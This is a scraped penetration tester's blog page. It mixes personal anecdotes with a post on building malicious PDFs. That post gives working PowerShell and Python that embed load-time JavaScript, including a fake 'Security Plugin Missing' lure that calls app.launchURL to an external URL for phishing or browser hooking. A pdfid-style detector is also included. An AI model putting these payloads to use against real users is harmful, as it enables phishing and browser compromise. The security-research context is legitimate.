Meet James Shewmaker. James Shewmaker is the founder of and principal consultant at Bluenotch Corporation in Long Beach, California, which provides customized security services focusing on investigations, penetration testing, and analysis.
James authored and maintains the post-exploitation content in the SANS SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course. Before becoming a SANS Certified Instructor in 2009, his creative technical work led him on many adventures, including “The Great Translator Invasion of 2003.” Read more at: https://cyber-defense.sans.org/blog/2018/10/22/shewmaker
Find me @jimshew
Instructor for SANS courses https://www.sans.org/instructors/james-shewmaker
- Updated logo
- New website
- Yearly duty – corporation tax prep ( excuse me while I hibernate and drown in expense reports )
- Make ten more checklist + reminder lists.
Happy New Year + Happy Groundhog Day. You would be surprised how many *ahem* younger people do not know what I’m referring to when I say “alarm clock scene – Bill Murray, Groundhog Day” ahhhh … and you guys can now “just Google it” on YouTube for instant gratification and add it to your knowledge base category and tags – the cult epic movies that are referenced in other movies. Circa 1993+ I had to record it on VHS if I wanted to watch that scene again (and worse yet, only on a tube television – what mobile smart phone?!)
Yes. I do wake up at 6am. Groundhog Day can be classified as a real life documentary, right?
Groundhog Day Scene HERE >
+ | shew |
In 2015, we drank a lot of Stumptown Coffee – roughly 900 homebrewed or take-away cups and thirty 12oz whole bean bags bought. It fueled a busy year as we worked around the world clock. We reminisced about the 2000s – everything from our involvement in Y2K radio reprogramming, The Great Translator Invasion, and the time the office got burglarized and the thieves took all the junk computers saved for an e-recycle drop off (yes!) and stole all the bottled water (shortage / drought in California?!) Needless to say, we have accumulated a lot of stories over the years.
In the cliché of looking back, I realize that there are a lot of unfinished projects and lists still to complete in 2015 – two days left! Prioritizing critical events and client visits comes first, over completing tasks like “You know < pause > I really need to update a wiki page!” or “Can we set up our twitter to amazon.com order?” And at the same time, those seem faster and easier to do in 10 minutes than what has been on our bucket lists. Anyone want to be an intern? Hah. I guess sipping coffee in 10 minutes became a priority and we had to put down the keyboard while drinking (fear of spillage). All jokes aside, we look forward to 2016. Happy New Year. + | shew |
+ I’ve been focused in 2015 on crafting malicious documents and VM forking.
+ | jim.shew |
When trying to solve a problem, I try to use PowerShell.
During a recent penetration test, I wanted to upload malicious DOC, XLS, and PDF files. I looked around my favorite exploit frameworks:
Metasploit | http://www.metasploit.com
Nishang | https://github.com/samratashok/nishang
Exploit-db | http://www.exploit-db.com/
Core IMPACT | http://www.coresecurity.com/core-impact-pro
Social Engineer Toolkit | https://github.com/trustedsec/social-engineer-toolkit
After some searching, I found Didier Stevens’s work, realizing I should have looked there first. Didier has pdfid.py for summary analysis and mPDF.py to build one. I wanted to go the PowerShell route, however, and all I could find was PDFSharp used in PowerShell print-to-PDF examples. I was surprised that nobody had published something similar to this.
A preliminary test script using the ideas above:
param(
    [string]$js = "app.alert('boom goes the reader '+app.reader);",
    [string]$msg = "Hello JS",
    [string]$filename = "C:\PDF\helloJS.pdf"
)
# PDFSharp (WPF build) does the PDF object plumbing
Add-Type -Path C:\pdf\PdfSharp-WPF.dll

$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $msg
$doc.Info.Creator = "@jimshew"
$page = $doc.AddPage()           # a PDF with zero pages will not save/open

# Action dictionary: << /S /JavaScript /JS (code) >>
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary($doc)
$dictjs.Elements.SetName("/S", "/JavaScript")
$dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfString($js)

# Name tree leaf: /Names [ (EmbeddedJS) <<action>> ]
# The reader runs every entry under the catalog's /JavaScript tree at load time.
$pdfarray = New-Object PdfSharp.Pdf.PdfArray($doc)
$embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")
$pdfarray.Elements.Add($embeddedstring)
$pdfarray.Elements.Add($dictjs)
$dict = New-Object PdfSharp.Pdf.PdfDictionary($doc)
$dict.Elements["/Names"] = $pdfarray

# Hang it off the catalog: /Names << /JavaScript << /Names [...] >> >>
# (the /JavaScript key, the array contents and the Save call were missing from the draft)
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary($doc)
$dictgroup.Elements["/JavaScript"] = $dict
$doc.Internals.Catalog.Elements["/Names"] = $dictgroup
$doc.Save($filename)
On opening the PDF in a modern reader with no settings changed, the alert fires:
Great, now we can taunt the victim, but what about something more interesting, like making external requests?
# Same script, different parameters (Acrobat JavaScript is case-sensitive: app.launchURL, not LaunchURL)
$js = "app.alert('Security Plugin Missing, Launching installer');app.launchURL('http://bluenotch.com/pwn.php',true);"
$msg = "Security Plugin FAIL"
$filename = "C:\PDF\helloHTTP.pdf"
So it’s easy to see how we can leverage this in a phishing or social engineering attack. In one recent assessment, the web portal that housed the PDFs was already on the reader’s allowed-URL list, so it didn’t even prompt the user before the launchURL redirect! That leaves the victim’s browser ripe for a Browser Exploitation Framework (BeEF) hook or Metasploit browser autopwn.
I’m still exploring the modern PDF functionality to build creative payloads that work on modern readers. One of those features is the form submit functionality, used by the sample webug-reader.pdf in Origami (see the work by Frédéric Raynal and Guillaume Delugré below).
I’ll be turning this into a proper PowerShell module soon (assuming my battery holds out during the next series of flights). For more on PDF hijinks, you may want to check out:
Origami – a framework for generating malicious PDFs:
Online PDF analyzer:
You probably want to check what app.launchURL destinations are already allowed in your reader; here is mine after checking the remember box on HelloHTTP.pdf:
+ | jimshew |
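To make the object structure concrete, here is an added example in Python (it is not the post’s PowerShell script and not Didier Stevens’s tools). It writes the same one-page PDF with a document-level JavaScript action, either under the catalog’s /Names /JavaScript name tree as the script above does or, going one step beyond the post, referenced from /OpenAction, with a correct xref table; it then triages the result with a pdfid-style keyword count that resolves #xx name escapes, which is the check a defender would run before trusting a PDF. The JavaScript strings are the two from the post; the output file name and the Info values are constructed for this example.

```python
"""Build a PDF carrying document-level JavaScript and triage it pdfid-style.

Added example: not the blog post's PowerShell script and not Didier Stevens's
tools. The JS payloads are the two quoted in the post; file names are
constructed for this example.
"""
import re
from typing import Dict, List


def pdf_string(s: str) -> bytes:
    """Encode s as a PDF literal string, escaping backslash, parens and CR/LF."""
    out = s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    out = out.replace("\r", "\\r").replace("\n", "\\n")
    return b"(" + out.encode("latin-1") + b")"


def build_js_pdf(js: str, title: str = "Hello JS", creator: str = "@jimshew",
                 open_action: bool = False) -> bytes:
    """Return a minimal one-page PDF whose JavaScript runs when the file opens.

    open_action=False hangs the action off the catalog's /Names /JavaScript
    name tree (the structure the PowerShell script assembles); readers run every
    entry in that tree at load time. open_action=True references the same
    action dictionary from the catalog's /OpenAction instead.
    """
    action = b"<< /S /JavaScript /JS " + pdf_string(js) + b" >>"
    if open_action:
        hook = b"/OpenAction 5 0 R"
    else:
        hook = b"/Names << /JavaScript << /Names [ (EmbeddedJS) 5 0 R ] >> >>"
    objects: List[bytes] = [
        b"<< /Type /Catalog /Pages 2 0 R " + hook + b" >>",             # 1: catalog
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",                   # 2: page tree
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",     # 3: blank page
        b"<< /Title " + pdf_string(title) + b" /Creator " + pdf_string(creator) + b" >>",  # 4: Info
        action,                                                         # 5: JS action
    ]
    body = b"%PDF-1.5\n%\xe2\xe3\xcf\xd3\n"
    offsets = []
    for num, obj in enumerate(objects, start=1):
        offsets.append(len(body))          # byte offset of "num 0 obj" for the xref
        body += b"%d 0 obj\n%s\nendobj\n" % (num, obj)
    xref_pos = len(body)
    size = len(objects) + 1
    xref = b"xref\n0 %d\n0000000000 65535 f \n" % size
    xref += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    trailer = (b"trailer\n<< /Size %d /Root 1 0 R /Info 4 0 R >>\n"
               b"startxref\n%d\n%%%%EOF\n" % (size, xref_pos))
    return body + xref + trailer


def xref_is_consistent(data: bytes) -> bool:
    """True if startxref points at the table and every in-use entry at 'N 0 obj'.

    Readers usually repair a broken xref, but a file that needs repair is
    noisier and less reliable, so check the generator's output before use.
    """
    m = re.search(rb"startxref\s+(\d+)\s+%%EOF", data)
    if not m:
        return False
    pos = int(m.group(1))
    if data[pos:pos + 4] != b"xref":
        return False
    entries = re.findall(rb"(\d{10}) (\d{5}) ([nf])", data[pos:])
    for num, (off, _gen, kind) in enumerate(entries):
        if kind == b"n" and not data[int(off):].startswith(b"%d 0 obj" % num):
            return False
    return True


# Names pdfid reports; /JS, /JavaScript, /OpenAction and /Launch are the ones
# that matter for the documents built above.
KEYWORDS = ("/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch", "/URI",
            "/SubmitForm", "/EmbeddedFile", "/Page", "/ObjStm")


def pdfid_counts(data: bytes) -> Dict[str, int]:
    """Count suspicious names, resolving #xx escapes (/J#61vaScript) like pdfid."""
    counts = {k: 0 for k in KEYWORDS}
    for raw in re.findall(rb"/[^\s/\[\]<>(){}%]*", data):
        name = re.sub(rb"#([0-9A-Fa-f]{2})",
                      lambda m: bytes.fromhex(m.group(1).decode()), raw)
        key = name.decode("latin-1")
        if key in counts:
            counts[key] += 1
    return counts


if __name__ == "__main__":
    pdf = build_js_pdf("app.alert('boom goes the reader '+app.reader);")
    with open("helloJS.pdf", "wb") as fh:      # constructed output name
        fh.write(pdf)
    print(xref_is_consistent(pdf), pdfid_counts(pdf))
```

The name-tree variant shows up in pdfid output as two /JavaScript hits and one /JS; the /OpenAction variant as one of each plus /OpenAction. Attackers hide those names with #xx escapes, which is why the counter resolves them before matching, the same way pdfid does.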
I was living in southern Idaho
and back then, it meant a requirement to travel. I was just starting a radio internship at a network of stations – format of rock / alt indie – and quickly headed to full-time work there. Yes, hours of fun, shows, tours, etc. But I still needed California vacation time. So yes, 60-80 hours a week in a closet-size studio, and visiting my home, Southern California, was a priority. Granted, Idaho has great white water rivers and white powder snow-capped mountains, but still – surf, sand, and retail sunshine were missing.
The gateway medium? Electronic plane tickets via Expedia and Hotmail. Both I didn’t have yet. So I signed up for a Hotmail account via Internet Explorer. Awwww … I miss those early Passport MSN Messenger IM and “one new message” bar sounds – nostalgia. Back to rewind, 1999: okay, so not everyone had Hotmail yet – mostly Yahoo or AOL, and Microsoft had recently acquired Hotmail. I still had a difficult time getting my third-choice account name. So brain-bending – one simple combo was available! Full first name and last initial. Two minutes later, done registering, the welcome email arrives. Step two – I start to book on Expedia … Need an account. My email is already registered?!? What? Okay …. “Forgot password.” Send. You didn’t fail to read the title here, summer of 1999, right? Just checking. Well, despite me not caring about why it was a registered email user account < look, I had late nights, was not yet a daily straight-up espresso drinker, and really did not think much of it; it was highly likely and logical that I had started an account process and forgotten to finish it one late night > I waited. The password was emailed to me … some vacationy-type password. Again, highly likely I made it that password – no red flag. Odd, right? But true. The password was five characters long. High five. I think about a month later I forgot the password … Reset and added a “1”. Good job? Yes, this means more out-of-town trips were booked.
A couple of months later I get an email from the old Hotmail user letting me know it was once his, but he’s “moved on.” < bitter much > And I think we even might have mentioned my hijack of Expedia. Laugh. He had a similar name, lived in Washington state and was a computer nerd of some sort. I still recall his name, and he emailed me again several years back just to say hi … ahem, or to try to get his email back. I just looked him up on LinkedIn – Senior Infosec Engineer, now lives in Utah. Look, it was a free Risk-game-type takeover. In the words of Seinfeld’s Kramer, “The Ukraine is weak.” + | shew |
Same year, same station, different channel role
It was my job, nay duty, to encourage user security awareness. My favorite technique was to “baggy pants” anyone leaving their email open. They would return to their desk and find an email (from themselves) declaring how cool they are and how their pants are the baggiest. Or a claim that their password was weak and they should change it …+ | jimshew |
P.S. Irony – I was a victim of such ^^ email shenanigans ^^ . + | shew |
In January 2008, the Bush Administration established the Comprehensive National Cybersecurity Initiative (CNCI). Recently, the Obama Administration released several notices on cybersecurity, below is an Executive Order.
By the authority vested in me as President by the Constitution and the laws of the United States of America, it is hereby ordered as follows:
Section 1. Policy. In order to address cyber threats to public health and safety, national security, and economic security of the United States, private companies, nonprofit organizations, executive departments and agencies (agencies), and other entities must be able to share information related to cybersecurity risks and incidents and collaborate to respond in as close to real time as possible.
Continue reading here http://www.whitehouse.gov/the-press-office/2015/02/13/executive-order-promoting-private-sector-cybersecurity-information-shari
It is of note, during this White House Summit held at Stanford University, CEOs from Google, Yahoo, Facebook – absent. Tim Cook, Apple CEO, attended.
SMALL TALK On a coffee + laptop observational side note: I was at a coffee bar on Saturday and there were only Macs everywhere. Yes, I did the 360 check while waiting for my Americano-latte. It’s like you could only stay and drink coffee if you owned an Apple product … and sign on the Square POS iPad (which, can we agree, we love / hate the emailed receipt?!). So apparently, if I bring my ThinkPad, I might need to trek down to the other coffee shop down the street – they use an older-school point of sale system and have the most amazing hazelnut gelato. + | shew |
SMALL TALK I’m working on my five year plan, just trying to figure out the font. < that’s a line in the pilot episode of Chuck > I’ll be honest, that was the funniest line, made me laugh and I’ve used it as a tag line — but I never watched past the pilot episode (nor ever used Geek Squad). + | shew |
Since we’re on a television tangent … Just saw an ESXi console on Blacklist, now I *know* it’s a documentary. + | james.shew |
NERD TALK requires more espresso. And since it’s late, ahem early am and we are up wrestling technical fun time warps, I’ll save my eloquent thoughts for the mid morning first jumpstart shot of caffeine. Thank you Sidecar, Stumptown, Rose Park, and even in the pinch, Starbucks for the assists.
+ | shew |
UPDATE 15.48 | A Nice SRP Circumventing Trick | During a recent penetration test, my goal was to smuggle data out of a hardened virtual application. This particular test included a vApp designed to restrict everything not needed to display and edit a Word document. Between Group Policy Objects and Software Restriction Policies, there were practically no third-party applications available to manipulate, and most Windows internal programs were either removed or hijacked by a Digital Rights Management (DRM) DLL.